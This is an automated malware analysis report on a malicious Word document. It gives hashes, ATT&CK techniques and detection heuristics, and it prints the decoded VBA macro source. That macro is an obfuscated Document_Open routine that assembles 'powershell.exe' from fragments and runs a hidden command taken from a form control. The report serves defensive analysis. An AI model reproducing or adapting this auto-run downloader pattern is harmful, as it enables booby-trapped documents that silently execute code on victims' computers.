Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8e3e4a594f4dacf1…

MALICIOUS

Office (OLE)

265.0 KB Created: 2019-02-04 22:59:00 Authoring application: Microsoft Office Word First seen: 2019-03-18
MD5: 0e2a5c5c03fbf999e4befafd7b15aae7 SHA-1: c93b216cd2e4fdf4986a109af1bd9eaad9d63c55 SHA-256: 8e3e4a594f4dacf16227560d89573f658141dca45258d026e17fb2fedc9e2739
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function. This function is used to execute 'shell.exe' along with other obfuscated arguments, indicating a downloader behavior. The presence of the Shell() call and the Document_Open macro strongly suggests the execution of a malicious payload.

Heuristics 5

  • ClamAV: Doc.Downloader.00536d-6846259-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6846259-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1492 bytes
SHA-256: 341fd55a14a024496365e3851e793f74cddb820ff63f64bbee6d3ebc2fdfc947
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
Dim Lal9sewRS(16 To 256) As Long
Lal9sewRS(16) = 1736 / 14
Dim SU1Za7WH(16 To 256) As String
SU1Za7WH(16) = "di9dR"

Dim kzd2rG As Long
kzd2rG = (749 - 721) / (51)
Dim vlRWIEg(14 To 53) As Long
vlRWIEg(14) = 27900 / 150

Dim Mc7K1(97) As Byte
Dim sv01F() As Byte
Call w("er")
End Sub

Attribute VB_Name = "OJ75BFVLN"
Sub w(dlIXbHJ)
Dim nWG1IpQ As Long
nWG1IpQ = (19431 / 1143) / (14)
Dim U4R82 As String
U4R82 = Z3VDra
Dim pvmY6j() As Byte
T9qT5e = "shell.exe "
Shell R38TY67FU() _
& dlIXbHJ _
& T9qT5e _
& UhECSaq _
, 0
End Sub

Attribute VB_Name = "eI5Y1vzA3"
Public Function R38TY67FU() As String
R38TY67FU = "pow"
End Function

Attribute VB_Name = "NrshV7NUp"
Public Function UhECSaq()
Dim WGC2R1 As Object
Set WGC2R1 = New f
Dim hdW8KY3 As String
hdW8KY3 = WGC2R1.de.Text
UhECSaq = hdW8KY3
End Function

Attribute VB_Name = "f"
Attribute VB_Base = "0{8D46682B-BD75-477E-8D30-504C6779F9DC}{767822C8-34FF-4FF4-8F1E-3B8E681E7D41}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.